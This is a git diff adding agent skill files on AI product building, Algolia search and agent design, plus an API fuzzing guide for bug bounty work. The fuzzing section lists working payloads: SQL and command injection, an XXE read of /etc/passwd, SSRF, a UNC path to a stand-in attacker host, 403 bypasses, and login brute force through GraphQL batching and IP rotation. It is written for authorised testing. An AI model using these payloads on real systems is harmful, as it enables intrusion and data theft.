| Agent has too many tools | medium | Curate tools per task: |
|
||||
| Using multiple agents when one would work | medium | Justify multi-agent: |
|
||||
| Agent internals not logged or traceable | medium | Implement tracing: |
|
||||
| Fragile parsing of agent outputs | medium | Robust output handling: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
|
||||
54
skills/ai-product/SKILL.md
Normal file
54
skills/ai-product/SKILL.md
Normal file
@@ -0,0 +1,54 @@
|
||||
---
|
||||
name: ai-product
|
||||
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Product Development
|
||||
|
||||
You are an AI product engineer who has shipped LLM features to millions of
|
||||
users. You've debugged hallucinations at 3am, optimized prompts to reduce
|
||||
costs by 80%, and built safety systems that caught thousands of harmful
|
||||
outputs. You know that demos are easy and production is hard. You treat
|
||||
prompts as code, validate all outputs, and never trust an LLM blindly.
|
||||
|
||||
## Patterns
|
||||
|
||||
### Structured Output with Validation
|
||||
|
||||
Use function calling or JSON mode with schema validation
|
||||
|
||||
### Streaming with Progress
|
||||
|
||||
Stream LLM responses to show progress and reduce perceived latency
|
||||
|
||||
### Prompt Versioning and Testing
|
||||
|
||||
Version prompts in code and test with regression suite
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Demo-ware
|
||||
|
||||
**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
|
||||
|
||||
### ❌ Context window stuffing
|
||||
|
||||
**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
|
||||
|
||||
### ❌ Unstructured output parsing
|
||||
|
||||
**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Trusting LLM output without validation | critical | # Always validate output: |
|
||||
| User input directly in prompts without sanitization | critical | # Defense layers: |
|
||||
| Stuffing too much into context window | high | # Calculate tokens before sending: |
|
||||
| Waiting for complete response before showing anything | high | # Stream responses: |
|
||||
| Not monitoring LLM API costs | high | # Track per-request: |
|
||||
| App breaks when LLM API fails | high | # Defense in depth: |
|
||||
| Not validating facts from LLM responses | critical | # For factual claims: |
|
||||
| Making LLM calls in synchronous request handlers | high | # Async patterns: |
|
||||
273
skills/ai-wrapper-product/SKILL.md
Normal file
273
skills/ai-wrapper-product/SKILL.md
Normal file
@@ -0,0 +1,273 @@
|
||||
---
|
||||
name: ai-wrapper-product
|
||||
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Wrapper Product
|
||||
|
||||
**Role**: AI Product Architect
|
||||
|
||||
You know AI wrappers get a bad rap, but the good ones solve real problems.
|
||||
You build products where AI is the engine, not the gimmick. You understand
|
||||
prompt engineering is product development. You balance costs with user
|
||||
experience. You create AI products people actually pay for and use daily.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- AI product architecture
|
||||
- Prompt engineering for products
|
||||
- API cost management
|
||||
- AI usage metering
|
||||
- Model selection
|
||||
- AI UX patterns
|
||||
- Output quality control
|
||||
- AI product differentiation
|
||||
|
||||
## Patterns
|
||||
|
||||
### AI Product Architecture
|
||||
|
||||
Building products around AI APIs
|
||||
|
||||
**When to use**: When designing an AI-powered product
|
||||
|
||||
```python
|
||||
## AI Product Architecture
|
||||
|
||||
### The Wrapper Stack
|
||||
```
|
||||
User Input
|
||||
↓
|
||||
Input Validation + Sanitization
|
||||
↓
|
||||
Prompt Template + Context
|
||||
↓
|
||||
AI API (OpenAI/Anthropic/etc.)
|
||||
↓
|
||||
Output Parsing + Validation
|
||||
↓
|
||||
User-Friendly Response
|
||||
```
|
||||
|
||||
### Basic Implementation
|
||||
```javascript
|
||||
import Anthropic from '@anthropic-ai/sdk';
|
||||
|
||||
const anthropic = new Anthropic();
|
||||
|
||||
async function generateContent(userInput, context) {
|
||||
// 1. Validate input
|
||||
if (!userInput || userInput.length > 5000) {
|
||||
throw new Error('Invalid input');
|
||||
}
|
||||
|
||||
// 2. Build prompt
|
||||
const systemPrompt = `You are a ${context.role}.
|
||||
Always respond in ${context.format}.
|
||||
Tone: ${context.tone}`;
|
||||
|
||||
// 3. Call API
|
||||
const response = await anthropic.messages.create({
|
||||
model: 'claude-3-haiku-20240307',
|
||||
max_tokens: 1000,
|
||||
system: systemPrompt,
|
||||
messages: [{
|
||||
role: 'user',
|
||||
content: userInput
|
||||
}]
|
||||
});
|
||||
|
||||
// 4. Parse and validate output
|
||||
const output = response.content[0].text;
|
||||
return parseOutput(output);
|
||||
}
|
||||
```
|
||||
|
||||
### Model Selection
|
||||
| Model | Cost | Speed | Quality | Use Case |
|
||||
|-------|------|-------|---------|----------|
|
||||
| GPT-4o | $$$ | Fast | Best | Complex tasks |
|
||||
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
|
||||
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
|
||||
| Claude 3 Haiku | $ | Fastest | Good | High volume |
|
||||
```
|
||||
|
||||
### Prompt Engineering for Products
|
||||
|
||||
Production-grade prompt design
|
||||
|
||||
**When to use**: When building AI product prompts
|
||||
|
||||
```javascript
|
||||
## Prompt Engineering for Products
|
||||
|
||||
### Prompt Template Pattern
|
||||
```javascript
|
||||
const promptTemplates = {
|
||||
emailWriter: {
|
||||
system: `You are an expert email writer.
|
||||
Write professional, concise emails.
|
||||
Match the requested tone.
|
||||
Never include placeholder text.`,
|
||||
user: (input) => `Write an email:
|
||||
Purpose: ${input.purpose}
|
||||
Recipient: ${input.recipient}
|
||||
Tone: ${input.tone}
|
||||
Key points: ${input.points.join(', ')}
|
||||
Length: ${input.length} sentences`,
|
||||
},
|
||||
};
|
||||
```
|
||||
|
||||
### Output Control
|
||||
```javascript
|
||||
// Force structured output
|
||||
const systemPrompt = `
|
||||
Always respond with valid JSON in this format:
|
||||
{
|
||||
"title": "string",
|
||||
"content": "string",
|
||||
"suggestions": ["string"]
|
||||
}
|
||||
Never include any text outside the JSON.
|
||||
`;
|
||||
|
||||
// Parse with fallback
|
||||
function parseAIOutput(text) {
|
||||
try {
|
||||
return JSON.parse(text);
|
||||
} catch {
|
||||
// Fallback: extract JSON from response
|
||||
const match = text.match(/\{[\s\S]*\}/);
|
||||
if (match) return JSON.parse(match[0]);
|
||||
throw new Error('Invalid AI output');
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Quality Control
|
||||
| Technique | Purpose |
|
||||
|-----------|---------|
|
||||
| Examples in prompt | Guide output style |
|
||||
| Output format spec | Consistent structure |
|
||||
| Validation | Catch malformed responses |
|
||||
| Retry logic | Handle failures |
|
||||
| Fallback models | Reliability |
|
||||
```
|
||||
|
||||
### Cost Management
|
||||
|
||||
Controlling AI API costs
|
||||
|
||||
**When to use**: When building profitable AI products
|
||||
|
||||
```javascript
|
||||
## AI Cost Management
|
||||
|
||||
### Token Economics
|
||||
```javascript
|
||||
// Track usage
|
||||
async function callWithCostTracking(userId, prompt) {
|
||||
const response = await anthropic.messages.create({...});
|
||||
|
||||
// Log usage
|
||||
await db.usage.create({
|
||||
userId,
|
||||
inputTokens: response.usage.input_tokens,
|
||||
outputTokens: response.usage.output_tokens,
|
||||
cost: calculateCost(response.usage),
|
||||
model: 'claude-3-haiku',
|
||||
});
|
||||
|
||||
return response;
|
||||
}
|
||||
|
||||
function calculateCost(usage) {
|
||||
const rates = {
|
||||
'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
|
||||
};
|
||||
const rate = rates['claude-3-haiku'];
|
||||
return (usage.input_tokens * rate.input +
|
||||
usage.output_tokens * rate.output) / 1_000_000;
|
||||
}
|
||||
```
|
||||
|
||||
### Cost Reduction Strategies
|
||||
| Strategy | Savings |
|
||||
|----------|---------|
|
||||
| Use cheaper models | 10-50x |
|
||||
| Limit output tokens | Variable |
|
||||
| Cache common queries | High |
|
||||
| Batch similar requests | Medium |
|
||||
| Truncate input | Variable |
|
||||
|
||||
### Usage Limits
|
||||
```javascript
|
||||
async function checkUsageLimits(userId) {
|
||||
const usage = await db.usage.sum({
|
||||
where: {
|
||||
userId,
|
||||
createdAt: { gte: startOfMonth() }
|
||||
}
|
||||
});
|
||||
|
||||
const limits = await getUserLimits(userId);
|
||||
if (usage.cost >= limits.monthlyCost) {
|
||||
throw new Error('Monthly limit reached');
|
||||
}
|
||||
return true;
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Thin Wrapper Syndrome
|
||||
|
||||
**Why bad**: No differentiation.
|
||||
Users just use ChatGPT.
|
||||
No pricing power.
|
||||
Easy to replicate.
|
||||
|
||||
**Instead**: Add domain expertise.
|
||||
Perfect the UX for specific task.
|
||||
Integrate into workflows.
|
||||
Post-process outputs.
|
||||
|
||||
### ❌ Ignoring Costs Until Scale
|
||||
|
||||
**Why bad**: Surprise bills.
|
||||
Negative unit economics.
|
||||
Can't price properly.
|
||||
Business isn't viable.
|
||||
|
||||
**Instead**: Track every API call.
|
||||
Know your cost per user.
|
||||
Set usage limits.
|
||||
Price with margin.
|
||||
|
||||
### ❌ No Output Validation
|
||||
|
||||
**Why bad**: AI hallucinates.
|
||||
Inconsistent formatting.
|
||||
Bad user experience.
|
||||
Trust issues.
|
||||
|
||||
**Instead**: Validate all outputs.
|
||||
Parse structured responses.
|
||||
Have fallback handling.
|
||||
Post-process for consistency.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| AI API costs spiral out of control | high | ## Controlling AI Costs |
|
||||
| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
|
||||
| AI gives wrong or made-up information | high | ## Handling Hallucinations |
|
||||
| AI responses too slow for good UX | medium | ## Improving AI Latency |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
|
||||
66
skills/algolia-search/SKILL.md
Normal file
66
skills/algolia-search/SKILL.md
Normal file
@@ -0,0 +1,66 @@
|
||||
---
|
||||
name: algolia-search
|
||||
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Algolia Search Integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### React InstantSearch with Hooks
|
||||
|
||||
Modern React InstantSearch setup using hooks for type-ahead search.
|
||||
|
||||
Uses react-instantsearch-hooks-web package with algoliasearch client.
|
||||
Widgets are components that can be customized with classnames.
|
||||
|
||||
Key hooks:
|
||||
- useSearchBox: Search input handling
|
||||
- useHits: Access search results
|
||||
- useRefinementList: Facet filtering
|
||||
- usePagination: Result pagination
|
||||
- useInstantSearch: Full state access
|
||||
|
||||
|
||||
### Next.js Server-Side Rendering
|
||||
|
||||
SSR integration for Next.js with react-instantsearch-nextjs package.
|
||||
|
||||
Use <InstantSearchNext> instead of <InstantSearch> for SSR.
|
||||
Supports both Pages Router and App Router (experimental).
|
||||
|
||||
Key considerations:
|
||||
- Set dynamic = 'force-dynamic' for fresh results
|
||||
- Handle URL synchronization with routing prop
|
||||
- Use getServerState for initial state
|
||||
|
||||
|
||||
### Data Synchronization and Indexing
|
||||
|
||||
Indexing strategies for keeping Algolia in sync with your data.
|
||||
|
||||
Three main approaches:
|
||||
1. Full Reindexing - Replace entire index (expensive)
|
||||
2. Full Record Updates - Replace individual records
|
||||
3. Partial Updates - Update specific attributes only
|
||||
|
||||
Best practices:
|
||||
- Batch records (ideal: 10MB, 1K-10K records per batch)
|
||||
- Use incremental updates when possible
|
||||
- partialUpdateObjects for attribute-only changes
|
||||
- Avoid deleteBy (computationally expensive)
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@@ -0,0 +1,430 @@
|
||||
---
|
||||
name: API Fuzzing for Bug Bounty
|
||||
description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
|
||||
---
|
||||
|
||||
# API Fuzzing for Bug Bounty
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Burp Suite or similar proxy tool
|
||||
- API wordlists (SecLists, api_wordlist)
|
||||
- Understanding of REST/GraphQL/SOAP protocols
|
||||
- Python for scripting
|
||||
- Target API endpoints and documentation (if available)
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Identified API vulnerabilities
|
||||
- IDOR exploitation proofs
|
||||
- Authentication bypass techniques
|
||||
- SQL injection points
|
||||
- Unauthorized data access documentation
|
||||
|
||||
---
|
||||
|
||||
## API Types Overview
|
||||
|
||||
| Type | Protocol | Data Format | Structure |
|
||||
|------|----------|-------------|-----------|
|
||||
| SOAP | HTTP | XML | Header + Body |
|
||||
| REST | HTTP | JSON/XML/URL | Defined endpoints |
|
||||
| GraphQL | HTTP | Custom Query | Single endpoint |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: API Reconnaissance
|
||||
|
||||
Identify API type and enumerate endpoints:
|
||||
|
||||
```bash
|
||||
# Check for Swagger/OpenAPI documentation
|
||||
/swagger.json
|
||||
/openapi.json
|
||||
/api-docs
|
||||
/v1/api-docs
|
||||
/swagger-ui.html
|
||||
|
||||
# Use Kiterunner for API discovery
|
||||
kr scan https://target.com -w routes-large.kite
|
||||
|
||||
# Extract paths from Swagger
|
||||
python3 json2paths.py swagger.json
|
||||
```
|
||||
|
||||
### Step 2: Authentication Testing
|
||||
|
||||
```bash
|
||||
# Test different login paths
|
||||
/api/mobile/login
|
||||
/api/v3/login
|
||||
/api/magic_link
|
||||
/api/admin/login
|
||||
|
||||
# Check rate limiting on auth endpoints
|
||||
# If no rate limit → brute force possible
|
||||
|
||||
# Test mobile vs web API separately
|
||||
# Don't assume same security controls
|
||||
```
|
||||
|
||||
### Step 3: IDOR Testing
|
||||
|
||||
Insecure Direct Object Reference is the most common API vulnerability:
|
||||
|
||||
```bash
|
||||
# Basic IDOR
|
||||
GET /api/users/1234 → GET /api/users/1235
|
||||
|
||||
# Even if ID is email-based, try numeric
|
||||
/?user_id=111 instead of /?user_id=user@mail.com
|
||||
|
||||
# Test /me/orders vs /user/654321/orders
|
||||
```
|
||||
|
||||
**IDOR Bypass Techniques:**
|
||||
|
||||
```bash
|
||||
# Wrap ID in array
|
||||
{"id":111} → {"id":[111]}
|
||||
|
||||
# JSON wrap
|
||||
{"id":111} → {"id":{"id":111}}
|
||||
|
||||
# Send ID twice
|
||||
URL?id=<LEGIT>&id=<VICTIM>
|
||||
|
||||
# Wildcard injection
|
||||
{"user_id":"*"}
|
||||
|
||||
# Parameter pollution
|
||||
/api/get_profile?user_id=<victim>&user_id=<legit>
|
||||
{"user_id":<legit_id>,"user_id":<victim_id>}
|
||||
```
|
||||
|
||||
### Step 4: Injection Testing
|
||||
|
||||
**SQL Injection in JSON:**
|
||||
|
||||
```json
|
||||
{"id":"56456"} → OK
|
||||
{"id":"56456 AND 1=1#"} → OK
|
||||
{"id":"56456 AND 1=2#"} → OK
|
||||
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
|
||||
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
|
||||
```
|
||||
|
||||
**Command Injection:**
|
||||
|
||||
```bash
|
||||
# Ruby on Rails
|
||||
?url=Kernel#open → ?url=|ls
|
||||
|
||||
# Linux command injection
|
||||
api.url.com/endpoint?name=file.txt;ls%20/
|
||||
```
|
||||
|
||||
**XXE Injection:**
|
||||
|
||||
```xml
|
||||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
|
||||
```
|
||||
|
||||
**SSRF via API:**
|
||||
|
||||
```html
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
```
|
||||
|
||||
**.NET Path.Combine Vulnerability:**
|
||||
|
||||
```bash
|
||||
# If .NET app uses Path.Combine(path_1, path_2)
|
||||
# Test for path traversal
|
||||
https://example.org/download?filename=a.png
|
||||
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
|
||||
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
|
||||
```
|
||||
|
||||
### Step 5: Method Testing
|
||||
|
||||
```bash
|
||||
# Test all HTTP methods
|
||||
GET /api/v1/users/1
|
||||
POST /api/v1/users/1
|
||||
PUT /api/v1/users/1
|
||||
DELETE /api/v1/users/1
|
||||
PATCH /api/v1/users/1
|
||||
|
||||
# Switch content type
|
||||
Content-Type: application/json → application/xml
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## GraphQL-Specific Testing
|
||||
|
||||
### Introspection Query
|
||||
|
||||
Fetch entire backend schema:
|
||||
|
||||
```graphql
|
||||
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
|
||||
```
|
||||
|
||||
**URL-encoded version:**
|
||||
|
||||
```
|
||||
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
|
||||
```
|
||||
|
||||
### GraphQL IDOR
|
||||
|
||||
```graphql
|
||||
# Try accessing other user IDs
|
||||
query {
|
||||
user(id: "OTHER_USER_ID") {
|
||||
email
|
||||
password
|
||||
creditCard
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL SQL/NoSQL Injection
|
||||
|
||||
```graphql
|
||||
mutation {
|
||||
login(input: {
|
||||
email: "test' or 1=1--"
|
||||
password: "password"
|
||||
}) {
|
||||
success
|
||||
jwt
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Rate Limit Bypass (Batching)
|
||||
|
||||
```graphql
|
||||
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
|
||||
```
|
||||
|
||||
### GraphQL DoS (Nested Queries)
|
||||
|
||||
```graphql
|
||||
query {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts { ... }
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL XSS
|
||||
|
||||
```bash
|
||||
# XSS via GraphQL endpoint
|
||||
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
|
||||
|
||||
# URL-encoded XSS
|
||||
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
|
||||
```
|
||||
|
||||
### GraphQL Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| GraphCrawler | Schema discovery |
|
||||
| graphw00f | Fingerprinting |
|
||||
| clairvoyance | Schema reconstruction |
|
||||
| InQL | Burp extension |
|
||||
| GraphQLmap | Exploitation |
|
||||
|
||||
---
|
||||
|
||||
## Endpoint Bypass Techniques
|
||||
|
||||
When receiving 403/401, try these bypasses:
|
||||
|
||||
```bash
|
||||
# Original blocked request
|
||||
/api/v1/users/sensitivedata → 403
|
||||
|
||||
# Bypass attempts
|
||||
/api/v1/users/sensitivedata.json
|
||||
/api/v1/users/sensitivedata?
|
||||
/api/v1/users/sensitivedata/
|
||||
/api/v1/users/sensitivedata??
|
||||
/api/v1/users/sensitivedata%20
|
||||
/api/v1/users/sensitivedata%09
|
||||
/api/v1/users/sensitivedata#
|
||||
/api/v1/users/sensitivedata&details
|
||||
/api/v1/users/..;/sensitivedata
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Output Exploitation
|
||||
|
||||
### PDF Export Attacks
|
||||
|
||||
```html
|
||||
<!-- LFI via PDF export -->
|
||||
<iframe src="file:///etc/passwd" height=1000 width=800>
|
||||
|
||||
<!-- SSRF via PDF export -->
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
|
||||
<!-- Port scanning -->
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
|
||||
<!-- IP disclosure -->
|
||||
<img src="https://iplogger.com/yourcode.gif"/>
|
||||
```
|
||||
|
||||
### DoS via Limits
|
||||
|
||||
```bash
|
||||
# Normal request
|
||||
/api/news?limit=100
|
||||
|
||||
# DoS attempt
|
||||
/api/news?limit=9999999999
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Common API Vulnerabilities Checklist
|
||||
|
||||
| Vulnerability | Description |
|
||||
|---------------|-------------|
|
||||
| API Exposure | Unprotected endpoints exposed publicly |
|
||||
| Misconfigured Caching | Sensitive data cached incorrectly |
|
||||
| Exposed Tokens | API keys/tokens in responses or URLs |
|
||||
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
|
||||
| IDOR / BOLA | Broken Object Level Authorization |
|
||||
| Undocumented Endpoints | Hidden admin/debug endpoints |
|
||||
| Different Versions | Security gaps in older API versions |
|
||||
| Rate Limiting | Missing or bypassable rate limits |
|
||||
| Race Conditions | TOCTOU vulnerabilities |
|
||||
| XXE Injection | XML parser exploitation |
|
||||
| Content Type Issues | Switching between JSON/XML |
|
||||
| HTTP Method Tampering | GET→DELETE/PUT abuse |
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Vulnerability | Test Payload | Risk |
|
||||
|---------------|--------------|------|
|
||||
| IDOR | Change user_id parameter | High |
|
||||
| SQLi | `' OR 1=1--` in JSON | Critical |
|
||||
| Command Injection | `; ls /` | Critical |
|
||||
| XXE | DOCTYPE with ENTITY | High |
|
||||
| SSRF | Internal IP in params | High |
|
||||
| Rate Limit Bypass | Batch requests | Medium |
|
||||
| Method Tampering | GET→DELETE | High |
|
||||
|
||||
---
|
||||
|
||||
## Tools Reference
|
||||
|
||||
| Category | Tool | URL |
|
||||
|----------|------|-----|
|
||||
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
|
||||
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
|
||||
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
|
||||
| API Security | apicheck | github.com/BBVA/apicheck |
|
||||
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
|
||||
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
|
||||
| API Toolkit | APIKit | github.com/API-Security/APIKit |
|
||||
| API Keys | API Guesser | api-guesser.netlify.app |
|
||||
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
|
||||
| GraphQL | InQL | github.com/doyensec/inql |
|
||||
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
|
||||
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
|
||||
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
|
||||
| GraphQL | batchql | github.com/assetnote/batchql |
|
||||
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
|
||||
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
|
||||
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
|
||||
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
|
||||
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
|
||||
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Test mobile, web, and developer APIs separately
|
||||
- Check all API versions (/v1, /v2, /v3)
|
||||
- Validate both authenticated and unauthenticated access
|
||||
|
||||
**Must Not:**
|
||||
- Assume same security controls across API versions
|
||||
- Skip testing undocumented endpoints
|
||||
- Ignore rate limiting checks
|
||||
|
||||
**Should:**
|
||||
- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
|
||||
- Check archive.org for historical API endpoints
|
||||
- Test for race conditions on sensitive operations
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: IDOR Exploitation
|
||||
|
||||
```bash
|
||||
# Original request (own data)
|
||||
GET /api/v1/invoices/12345
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Modified request (other user's data)
|
||||
GET /api/v1/invoices/12346
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Response reveals other user's invoice data
|
||||
```
|
||||
|
||||
### Example 2: GraphQL Introspection
|
||||
|
||||
```bash
|
||||
curl -X POST https://target.com/graphql \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
|
||||
| 401 on all endpoints | Try adding `?user_id=1` parameter |
|
||||
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
|
||||
| Rate limited | Use IP rotation or batch requests |
|
||||
| Can't find endpoints | Check Swagger, archive.org, JS files |
|
||||
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
@@ -0,0 +1,761 @@
|
||||
---
|
||||
name: autonomous-agent-patterns
|
||||
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool APIs, implementing permission systems, or creating autonomous coding assistants."
|
||||
---
|
||||
|
||||
# 🕹️ Autonomous Agent Patterns
|
||||
|
||||
> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Building autonomous AI agents
|
||||
- Designing tool/function calling APIs
|
||||
- Implementing permission and approval systems
|
||||
- Creating browser automation for agents
|
||||
- Designing human-in-the-loop workflows
|
||||
|
||||
---
|
||||
|
||||
## 1. Core Agent Architecture
|
||||
|
||||
### 1.1 Agent Loop
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ AGENT LOOP │
|
||||
│ │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Think │───▶│ Decide │───▶│ Act │ │
|
||||
│ │ (Reason) │ │ (Plan) │ │ (Execute)│ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ▲ │ │
|
||||
│ │ ┌──────────┐ │ │
|
||||
│ └─────────│ Observe │◀─────────┘ │
|
||||
│ │ (Result) │ │
|
||||
│ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
```python
|
||||
class AgentLoop:
|
||||
def __init__(self, llm, tools, max_iterations=50):
|
||||
self.llm = llm
|
||||
self.tools = {t.name: t for t in tools}
|
||||
self.max_iterations = max_iterations
|
||||
self.history = []
|
||||
|
||||
def run(self, task: str) -> str:
|
||||
self.history.append({"role": "user", "content": task})
|
||||
|
||||
for i in range(self.max_iterations):
|
||||
# Think: Get LLM response with tool options
|
||||
response = self.llm.chat(
|
||||
messages=self.history,
|
||||
tools=self._format_tools(),
|
||||
tool_choice="auto"
|
||||
)
|
||||
|
||||
# Decide: Check if agent wants to use a tool
|
||||
if response.tool_calls:
|
||||
for tool_call in response.tool_calls:
|
||||
# Act: Execute the tool
|
||||
result = self._execute_tool(tool_call)
|
||||
|
||||
# Observe: Add result to history
|
||||
self.history.append({
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call.id,
|
||||
"content": str(result)
|
||||
})
|
||||
else:
|
||||
# No more tool calls = task complete
|
||||
return response.content
|
||||
|
||||
return "Max iterations reached"
|
||||
|
||||
def _execute_tool(self, tool_call) -> Any:
|
||||
tool = self.tools[tool_call.name]
|
||||
args = json.loads(tool_call.arguments)
|
||||
return tool.execute(**args)
|
||||
```
|
||||
|
||||
### 1.2 Multi-Model Architecture
|
||||
|
||||
```python
|
||||
class MultiModelAgent:
|
||||
"""
|
||||
Use different models for different purposes:
|
||||
- Fast model for planning
|
||||
- Powerful model for complex reasoning
|
||||
- Specialized model for code generation
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.models = {
|
||||
"fast": "gpt-3.5-turbo", # Quick decisions
|
||||
"smart": "gpt-4-turbo", # Complex reasoning
|
||||
"code": "claude-3-sonnet", # Code generation
|
||||
}
|
||||
|
||||
